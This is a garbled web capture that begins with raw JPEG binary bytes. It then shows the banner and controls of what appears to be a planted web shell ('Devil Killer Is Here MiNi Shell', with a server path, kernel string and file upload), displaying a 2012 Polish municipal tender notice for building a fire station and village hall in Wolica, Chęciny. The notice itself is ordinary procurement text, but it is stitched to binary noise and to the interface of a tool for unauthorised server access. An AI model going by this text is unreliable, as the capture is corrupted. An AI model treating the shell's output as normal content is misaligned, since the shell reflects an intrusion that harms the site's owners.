JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120919/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120919/201453-N-2012.html

<p class="kh_header"><b>Chęciny: Budowa wielofunkcyjnego budynku obejmującego świetlicę wiejską oraz remizę OSP w Wolicy (gm. Chęciny)</b><br>
<b>Numer ogłoszenia: 201453 - 2012; data zamieszczenia: 19.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chęciny , Pl. 2 Czerwca 4, 26-060 Chęciny, woj. świętokrzyskie, tel. 041 3151006, faks 041 3151085.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.checiny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa wielofunkcyjnego budynku obejmującego świetlicę wiejską oraz remizę OSP w Wolicy (gm. Chęciny).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu oraz wielkości lub zakresu zamówienia:
Adres inwestycji: 
Gm. Chęciny, miejscowość: Wolica

Zakres inwestycji obejmuje:
	Wykonanie robót budowlanych związanych z budową budynku wielofunkcyjny mieszczącego remizę OSP oraz świetlicę wiejską wraz z niezbędnymi urządzeniami techniczno-budowlanymi, w tym z drogami wewnętrznymi i parkingami. 

Ogólna charakterystyka robót.
Powierzchnia zabudowy 488,00 m2, powierzchnia użytkowa 765,40 m2, wysokość 7,70 m,
Budynek stanowi obiekt wielofunkcyjny mieszczący remizę OSP oraz świetlicę wiejską wraz z niezbędnymi urządzeniami techniczno-budowlanymi, w tym z drogami wewnętrznymi i parkingami. Będzie to budynek wolnostojący z dwiema kondygnacjami nadziemnymi, niepodpiwniczony i dachem dwuspadowym o kącie nachylenia głównych połaci 35 o Technologia realizacji budynku: ściany murowane  wzmocnione trzpieniami żelbetonowymi , strop żelbetowy wylewany. Obiekt wyposażony w instalację elektryczną, wodno-kanalizacyjną i c.o. z własnej kotłowni oraz wentylację mechaniczną. Obiekt stanowi dwie strefy pożarowe (garaż i pozostała część budynku). Klasa odporności ogniowej - C. Kotłownia wydzielona ścianami i stropem EI60. Magazyn oleju wydzielony ścianami EI 120 i stropem REI 120 i zamknięty drzwiami EI60. Wszystkie elementy budynku NRO (nie rozprzestrzeniające  ognia). Zasadnicze zmiany  jakie wprowadza się do zatwierdzonego projektu to: likwidacja zespołu kuchennego mieszczącego się na poddaszu budynku przeprojektowanie instalacji wewnętrznej i elementów konstrukcyjnych budynku. W miejsce zespołu kuchennego projektuje się zaplecze świetlicy i pokój socjalny  pracowników  świetlicy, kantor obsługi świetlicy i WC pracowników. 
Dla potrzeb remizy na parterze budynku przewiduje się: Garaż wozów bojowych, pomieszczenie dyżurki, szatnię, umywalnię z ubikacją, pomieszczenie do mycia oraz suszenia odzieży i obuwia, magazyn środków gaśniczych i sprzętu pomocniczego, pomieszczenie na sprzęt porządkowy i kotłownia olejowa. Na poddaszu budynku przewiduje się : sala szkoleń i spotkań strażaków z aneksem kuchennym i WC.
Zespół świetlicy wiejskiej obejmuje: hall główny, WC gości, szatnię sala świetlicy oraz zaplecze świetlicy. 
Dane materiałowe:
Fundament   - ławy i stopy, żelbetowe wylewane z betonu B20 zbrojone stalą 34GS i StOS posadowione na głębokości -1,30 m poniżej posadzki 0,00 na gruncie stabilizowanym warstwą chudego betonu klasy B10 gr. 10 cm
- ściany fundamentowe oraz ściany parteru zagłębione w gruncie- murowane gr. 25 cm z bloczków betonowych na zaprawie cementowej
Ściany przyziemia - murowane z cegły kratówki gr 25 cm, zewnętrzne ocieplone styropianem gr 13 cm na zaprawie cem-wap marki 1,5 MPa. Usztywnienie ścian stanowią  rdzenie i wieńce żelbetowe wylewane z betonu B25.
Rdzenie, belki, nadproża - żelbetowe, wylewane z betonu B25 zbrojone stalą. Część nadproży z beleczek prefabrykowanych typu L-19
Stropy  - żelbetowe wylewane z betonu B25 zbrojone stalą 34GS i St3SX .
Schody - żelbetowe, wylewane z betonu B25 zbrojone stalą  34GS i St3SX .
Ścianki działowe -na parterze i poddaszu murowane z cegły ceramiczne dziurawki kl. 150 gr 12 cm i 6,5 na zaprawie cem-wap. marki 3 MPa
Stolarka okienna i drzwiowa:  typowa i indywidualna wg wykazu stolarki
Tynki wewnętrzne : cementowo-wapienne kat III lub gipsowe 
Obróbki blacharskie-wszystkie obróbki blacharskie , a więc podokienniki, rury spustowe, rynny i obróbki kominów wykonać z blachy stalowej ocynkowanej powlekanej gr. 0,6 mm. Rynny półokrągłe O  150mm
Kanały wentylacyjne i spalinowy- filary wentylacyjne i kominowy murowany z bloczków prefabrykowanych omurowanych cegłą ceramiczną klasy 150 na zaprawie cementowej marki 8. Zespoły kanałów wyprowadzone ponad dach do wysokości zgodnej z przepisami i pokryte betonową czapką.
Opaska - wokół budynku , z kostki brukowej szerokości 50 cm na podsypce z piasku. Styk kostki brukowej ze ścianą wypełnić kitem trwale plastycznym.
Elewacja -  tynki zewnętrzne strukturalne akrylowe . Ściany wewnętrzne budynku malować farbą emulsyjną w kolorze jasnym; w pom. sanitarno-higienicznych płytki glazurowane . Posadzki powinny być twarde, odporne na ścieranie, nienasiąkliwe, łatwo zmywalne; zalecany materiał- terakota, gress, tarket. Parapety zewnętrzne, rury spustowe, i rynny oraz elementy obróbek blacharskich malować olejno w kolorze ciemny brąz. 
Instalacje wodno-kanalizacyjne:
Instalacja wody do celów ppoż. - z rur stalowych ocynkowanych ze szwem o połączeniach gwintowanych. Prowadzenie pionów wodnych w szachtach  instalacyjnych, natomiast przewodów poziomych na poszczególnych kondygnacjach na konstrukcji wsporczej pod stropem. Instalację zaprojektowano jako rozgałęzioną. Piony hydrantowe doprowadzające wodę  surową do hydrantów O25 mm umieszczonych w specjalnych szafkach. Przewidziano łącznie 5 kpl. hydrantów dla budynku. 
Instalacje wody zimnej, ciepłej i cyrkulacji  - główne przewody rozprowadzające wykonane będą :
- dla wody zimnej dla celów sanitarnych i technologii z rur stalowych ocynkowanych ze szwem o połączeniach gwintowanych lub na kołnierze. Pozostałe przewody (poziomy i piony) na pozostałych kondygnacjach z rur z tworzywa sztucznego (PE lub PP)
-dla ciepłej wody użytkowej i cyrkulacji c.w.u. z rur warstwowych (stabilizowanych wkładką aluminiowa) w systemie UPONOR  łączonych przez zgrzewanie.
Prowadzenie pionów wodnych w szachtach instalacyjnych natomiast przewodów poziomych na poszczególnych kondygnacjach na konstrukcji wsporczej pod stropem. 
Armatura odcinająca i czerpalna na ciśnienie 10 bar (0,1 MPa) Przewiduje się zastosowanie urządzeń o zmniejszonym poborze wody. Na głównych rurociągach rozprowadzających wodę zastosowano zawory zwrotne. 
Baterie w części publicznej budynku w wykonaniu antywandalowym , w sanitariatach dla osób niepełnosprawnych - z wykorzystaniem baterii termostatycznych z funkcją antyoparzeniową. Główne rurociągi  rozprowadzające będą izolowane termicznie warstwą ze sztywnej pianki poliuretanowej 
Ciepła woda użytkowa o temp +60 oC będzie przygotowywana centralnie w kotłowni olejowej. Aby zapobiec schłodzeniu c.w.u. zaprojektowano instalację cyrkulacyjna z pompą. Dla odbiorników c.w.u. przewidziano armaturę  mieszakową i termostatyczną.
Instalacja kanalizacji sanitarnej - Kanalizację sanitarna stanowić będą trzy ciągi zbierające i odprowadzające ścieki sanitarne do studzienek rewizyjnych na zewnatrz budynku. Przejście poziomych rurociągów zbiorczych pod stopami fundamentowymi oraz przez ściany fundamentowe w rurach ochronnych stalowych. Kanalizację zaprojektowano z rur PVC. Poziomy i piony sanitarne w budynku układane w szachtach instalacyjnych a następnie pod posadzką w ziemi. Na poszczególnych kondygnacjach poziomu sanitarne prowadzone będą częściowo w warstwach posadzki a następnie pod stropem. Ścieki technologiczne z kotłowni olejowej odprowadzone będą przez wpusty podłogowe żeliwne O50 zasyfonowane do studzienki schładzającej. Przewody wykonać z rur i kształtek żeliwnych odpornych na podwyższoną temperaturę. Odwodnienie posadzki garażu- poprzez zespół wpustów do separatora substancji olejowych i ropopochodnych a następnie do szczelnego, bezodpływowego zbiornika na ścieki, znajdującego się na zewnątrz budynku. 
Instalacja co i ct oraz kotłownia olejowa
W skład instalacji grzewczych wchodzą:
-instalacja c.o. grzejnikowego
-instalacja c.t. dla potrzeb central wentylacyjnych 
Instalacja c.o. grzejnikowego - z rozdziałem mieszanym (główne rozprowadzenie czynnika pod stropem parteru) . Instalację stanowią dwie sekcje, z których pierwsza obsługuje pomieszczenia części przeznaczonej na remizę OSP natomiast druga  świetlicę wiejską. Dla instalacji przyjęto grzejniki panelowe typu RADSON INTEGRA. W garażu oraz w klatce schodowej zastosowano grzejniki RADSON COMPAKT zasilane tradycyjnie z boku. Wszystkie grzejniki wodne dolno zasilane od ściany. Podejście do grzejników INTEGRA w bruździe ściennej poprzez wygięcie sprężyną systemowa bez używania kolan zaprasowywanych. Podejścia do grzejników w garażu i klatce schodowej wykonać tradycyjnie jako boczne z zaworami termostatycznymi. Główne  przewody rozprowadzające czynnik grzewczy wykonać w systemie rur  tworzywowych przeznaczonych do instalacji c.o. wyposażonych we wkładkę aluminiową  z zabezpieczeniem antydyfuzyjnym. 
Instalacja ciepła technologicznego dla potrzeb wentylacji mechanicznej - instalacja c.t. dostarcza czynnik grzewczy do nagrzewnic central wentylacyjnych zlokalizowanych na poddaszu nieużytkowym oraz w garażu wozów strażackich.  Zasilanie instalacji - z rozdzielacza w pom. kotłowni. ; system zasilania wodno-pompowy dwururowy. Rurociągi wykonać z rur stalowych czarnych o połączeniach spawanych. Prowadzenie przewodów -pod stropem parteru. Trasy przewodów tak zostały dobrane, aby umożliwić samokompensację rurociągów. Przy połączeniach pionu z poziomem wykonać ramię kompensacyjne. Na rurociągach rozprowadzających zawory odcinające kulowe gwintowane typu Nanal, Vexve. Do regulacji instalacji zawory regulacyjno-pomiarowe. Dla zapewnienia obiegu przez nagrzewnice central wentylacyjnych przewidziano pompy obiegowe. W dostawie automatyki należy zapewnić możliwość sterowania zaworem trójdrożnym oraz pompą obiegową.
 Próby ciśnieniowe na zimno i na gorąco p=0,5 MPaw czasie trwania t=30 min. Sieć rozdzielczą izolować otuliną typu THERMAFLEX FRZ lub CLIMAFLEX.
Kotłownia olejowa - Do przygotowania czynnika grzejnego zaprojektowano stalowy kocioł wodny niskotemperaturowy  o mocy 150 kW. Kocioł wyposażyć w palnik nadmuchowy, dwustopniowy. Palnik jest przystosowany do spalania oleju opałowego. Na kotle dla utrzymania stałego przepływu wody zastosowano pompę kotłową; zabezpieczeniem kotła przed wzrostem ciśnienia będzie membranowy zawór bezpieczeństwa. Dla utrzymania stabilizacji ciśnienia w instalacji grzewczej oraz instalacji kotłów zaprojektowano naczynie wyrównawcze podłączone do głównego rozdzielacza powrotnego kotłowni znajdować się będzie rozdzielacz zasilający i powrotny dla dwóch obiegów grzewczych instalacji c.o. oraz obiegi instalacji c.t. Na każdym z rozdzielaczy zamontować zawory spustowe oraz manometry .W celu zabezpieczenia kotła i pomp przed zanieczyszczeniami należy zamontować filtroodmulnik ( na głównym rurociągu powrotnym) Wszystkie przewody instalacji grzewczej w  obrębie kotłowni  wykonać z rur stalowych czarnych  średnich ze szwem.  Rurociągi uzupełniające wodę do zładu instalacji c.o. oraz rurociągi wody zimnej do podgrzewacza wykonać z rur stalowych ocynkowanych. Rurociągi wody ciepłej oraz cyrkulacji wykonać z rur tworzywowych PE. Spaliny z kotła odprowadzane indywidualnym czopuchem dwuściennym do komina jednościennego z blachy kwasoodpornej umieszczonego w kanale spalinowym. Wysokość komina około 12,6 m. Magazynowanie oleju w wydzielonym pomieszczeniu ; zbiorniki dwupłaszczowe z PE o poj. 4x1000 l.
Wentylacja mechaniczna
System wentylacji podzielony na kilka układów wentylacyjnych. Kanały wentylacyjne muszą mieć gładkie ściany a wykonanie kształtek i połączeń powinno być wykonane aerodynamicznie. Przewody i kształtki z blachy stalowej ocynkowanej oraz przewody okrągłe typu Spiro. Kanały w garaży ze stali kwasoodpornej, kratki w wykonaniu nierdzewnym. Wentylacja podzielona została na niezależne układy wentylacyjne; podziału dokonano na podstawie funkcji poszczególnych pomieszczeń.
Wywiew z sanitariatów, umywalni i pom. porządkowych realizowany będzie za pomocą osobnych wyciągów. Pozostałe pomieszczenia nie obsługiwane przez wen. Mechaniczną wentylowane będą grawitacyjnie. Centrale wentylacyjne umieszczone zostaną na poziomie strychu nieużytkowego. Jedna z central jest centralą podwieszana i znajdować się będą w pom. garażu. Kanały wentylacyjne prowadzące powietrze należy ocieplić matami z wełny mineralnej w płaszczu z folii aluminiowej. Kanały nawiewne i wywiewne prowadzone po strychu należy również ocieplić matami w płaszczu z folii aluminiowej. Przewody wentylacyjne oraz izolacje wykonać z materiałów niepalnych. 
Branża elektryczna 
Projekt obejmuje zabudowę czterech tablic rozdzielczych typu XL 4x24 i sześciu tablic XL 2x24 wraz z budową instalacji elektrycznej oświetleniowej i gniazd jednofazowych oraz wypustów siłowych dla wentylacji, kotłowni  i  pom. socjalnych oraz budowę instalacji ochrony przeciwporażeniowej i połączeń wyrównawczych w całym obiekcie.  Instalację w budynku wykonać jako podtynkową. Obwody do oświetlenia wykonać przewodami YDY 3x1,5 mm2, obwód do oświetlenia awaryjnego przewodami 2xYDY 3x2,5 mm2 , obwody siłowe należy wykonać przewodami YDY lub YLY pięciożyłowymi. Na przejściach instalacji przez stropy i ściany przewody prowadzić w rurkach ochronnych. Oświetlenie przyjęto  żarowe w pom. sanitarnych i na zapleczu. Oprawy w łazienkach i sanitariatach z kloszami mlecznymi. W pomieszczeniach rekreacyjnych, szatniach i na korytarzach przyjęto oświetlenie jarzeniowe. Jako środek dodatkowej ochrony przed porażeniem zastosowano szybkie wyłączenie zasilania  przez wyłączniki przeciwporażeniowe. Na budynku należy wykonać instalację odgromową
Branża drogowa 
Zagospodarowanie terenu jest ściśle związane z funkcją i technologią budynku. Komunikacja z drogi powiatowej poprzez istniejący zjazd. W obrębie obiektu komunikacji stanowi droga dojazdowa na tył budynku, gdzie znajduje się plac manewrowy dla samochodów straży pożarnej, parkingi . Od strony frontowej zaprojektowano plac manewrowy i parkingi z płyt ażurowych. Konstrukcja nawierzchni placu manewrowego, parkingów ni drogi dojazdowej: kostka betonowa wibrowana gr 8,0 cm na podsypce piaskowej , podbudowa -kruszywo stabilizowane mechanicznie gr 25 cm, podsypka z piaski gr 20 cm. Z placów manewrowych. Placów i parkingów wody opadowe odprowadzane będą poprzez kratki wpustowe z osadnikami piasku do systemu kanalizacji zamkniętej i do studzienek chłonnych.

Do realizacji w 2012 roku:
1.	Rozbiórka  budynku gospodarczego , parterowego o wymiarach 12,50 x 5,0 m z cegłu silikatowej, strop żelbetowy i wywóz gruzu na miejsce wskazane przez Inwestora
2.	Roboty ziemne : usunięcie warstwy  humusu, wykopy oraz przekopy pod fundamenty budynku
3.	Konstrukcje betonowe i żelbetowe (część):  podkłady betonowe z betonu B 10 pod ławy, stopy, płytę oraz ławy fundamentowe prostokątne żelbetowe szer. Do 0,6 m z betonu B20z zastosowanie pompy do betonu.
Pozostała część robót do realizacji w 2013 roku. 
	

Szczegółowy zakres robót oraz warunki ich realizacji zawierają:
a) projekt budowlany 
b) projekt wykonawczy 
c) specyfikacje techniczne wykonania i odbioru robót 
UWAGA!
1.	Załączone do specyfikacji przedmiary robót  nie są elementem dokumentacji projektowej, lecz stanowią materiał pomocniczy na użytek:
-	określenia minimalnych norm technicznych i jakości materiałów i urządzeń ,
-	oceny, czy nie zachodzi przypadek rażąco niskiej ceny.
Wykonawcy zobowiązani są dokonać wizji lokalnej terenu w celu uzyskania wszelkich informacji niezbędnych do prawidłowego przygotowania oferty.
Dokumentacja projektowa wskazuje dla niektórych materiałów i urządzeń znaki towarowe lub po-chodzenie. W tych przypadkach wszystkie użyte w projektach technicznych, przedmiarach robót, specyfikacjach technicznych wykonania i odbioru robót budowlanych nazwy produk-tów, firm mają tylko zastosowanie do określenia parametrów technicznych i jakościowych urządzeń oraz materiałów wymaganych przez Zamawiającego do realizacji zadania. Zama-wiający dopuszcza możliwość zastosowanie innych materiałów i urządzeń, niż podane w dokumentacji projektowej, pod warunkiem zapewnienia parametrów nie gorszych niż określone w tej dokumentacji (materiały i urządzenia równoważne). Wykonawca, który zastosował materiały lub urządzenia równoważne ma obowiązek wskazać w swojej ofercie, jakie materiały lub urządzenia zostały zamienione i określić, jakie materiały i urządzenia w ich miejsce proponuje. W przypadku, gdy zastosowanie zaoferowanych w ofercie materiałów lub urządzeń równoważnych w toku reali-zacji robót będzie wymagać zmiany dokumentacji projektowej, Wykonawca uzyska na dokonanie tych zmian zgodę Zamawiającego i Jednostki Projektowania oraz poniesie koszty związane z prze-projektowaniem. Konieczność przeprojektowania nie skutkuje zmianą terminu wykonania przed-miotu umowy i wynagrodzenia należnego Wykonawcy.
Jakość dostarczonych do budowy materiałów, wyrobów i elementów musi być zgodna z wymaga-niami normowymi, atestami, świadectwami dopuszczenia do stosowania i ustaleniami projektów wykonawczych oraz wymaganiami zawartymi w SIWZ. Dokumenty potwierdzające spełnienie po-wyższych warunków Wykonawca przekaże Zamawiającemu.
Wykonanie zamówienia obejmuje również:
-	opracowanie planu bezpieczeństwa i ochrony zdrowia,
-	wykonanie wszelkich robót przygotowawczych i porządkowych, w tym zagospodarowania placu budowy, utrzymania i później likwidacji zaplecza budowy, wraz z wykonaniem i likwidacją mediów na potrzeby realizacji robót oraz ich użytkowanie,
-	organizację ruchu na czas prowadzenia robót i uzyskanie decyzji na zajęcie pasa drogowego,
-	odwodnienie terenu budowy i ewentualne pompowanie wody,
-	wywóz nadmiaru gruntu, dowóz ziemi z jej zakupem, ewentualną wymianę gruntów lub ich zagęszczanie, jak i nakłady na roboty w związku ze zmianą kategorii gruntu,
-	właściwe postępowanie z odpadami powstałymi przy wykonywaniu przedmiotu umowy; Wykonawca ponosi pełną odpowiedzialność za naruszenie przepisów dotyczących ochrony środowiska na terenie budowy i na terenie przyległym do terenu oraz postępowanie z odpadami w stopniu całkowicie zwalniającym od tej odpowiedzialności Zamawiającego (ustawa z dnia 27 kwietnia 2001r. o odpadach (tekst jedn. Dz. U. z 2007r. Nr 39, poz. 251 z późn. zm.) oraz ustawa z dnia 27 kwietnia 2001r. Prawo ochrony środowiska (tekst jedn. Dz. U. z 2008r. Nr 25, poz. 150 z późn. zm.);
-	przekopy kontrolne, w tym wykonanie ewentualnych przekładek w przypadku kolizji z istniejącym uzbrojeniem,
-	ewentualną wycinkę drzew, krzaków wraz z uzyskaniem stosownych decyzji w imieniu Zamawiającego, jeżeli taka konieczność wystąpi w toku realizacji przedmiotu zamówienia,
-	odtworzenia dróg i chodników zniszczonych w trakcie realizacji robót,
-	pełną obsługę geologiczną i geodezyjną wraz z inwentaryzacją powykonawczą,
-	wykonanie dokumentacji powykonawczej,
-	doprowadzenia terenu do stanu pierwotnego (z uwzględnieniem stanu wynikającego z wykonanych robót budowlanych) po zakończeniu realizacji robót,
-	przeprowadzenie rozruchu technologicznego (po stronie Wykonawcy koszty mediów, zużycia materiałów dla potrzeb rozruchu, badań, prób, ocen, analiz wraz z kosztem uzyskania stosownych badań przez odpowiednie instytucje w tym zakresie, jeżeli jest to wymagane przepisami prawa oraz sporządzenie dokumentacji z rozruchu),
-	opracowanie świadectwa energetycznego zgodnie z wymogami prawa budowlanego,
-	uzyskanie   pozwolenia   na   użytkowanie   obiektu   wraz   z   opiniami   i   stanowiskami   organów wymienionych w art. 56 Prawa budowlanego w imieniu Zamawiającego,
-	dostarczenie instrukcji użytkowania obiektu, w tym m.in. instrukcje użytkowania sprzętu i urządzeń obiektu oraz instrukcje stanowiskowe,
-	przeprowadzenie szkolenia pracowników Zamawiającego w zakresie obsługi sprzętu i urządzeń obiektu wraz ze szkoleniami stanowiskowymi,
-	dostarczenie instrukcji bezpieczeństwa pożarowego wraz z wyposażeniem w sprzęt p.poż. (gaśnice, koce, itp.).
Zamawiający wymaga udzielenia przez Wykonawcę gwarancji, która obejmuje usuwanie awarii i usterek oraz przeglądy gwarancyjne zapewniające bezusterkową eksploatację w okresie:  36 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających, o których mowa w art. 67 ust. 6 ustawy Prawo zamówień publicznych do 20 % zamówienia podstawowego polegających na powtórzeniu zamówienia podstawowego obejmuje roboty budowlane budynku oraz przebudowę i zagospodarowanie terenu.;</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.13.50-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 100 000.00 zł (słownie: sto tysięcy 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Wykonawcy muszą wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonali co najmniej dwa zamówienia odpowiadające przedmiotowi niniejszego zamówienia, tzn. wykonali dwie roboty budowlane, każda o wartości brutto nie mniejszej niż  4 000 000,00 złotych polegające na budowie, przebudowie lub rozbudowie budynków użyteczności publicznej w tym: 
- co najmniej 1 robotę budowlaną dla obiektu o kubaturze nie mniejszej niż 4 600 m3;

UWAGI
-	Przez budynek użyteczności publicznej rozumie się budynek o którym mowa w Rozporządzeniu Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. nr 75 poz. 690 ze zm.).
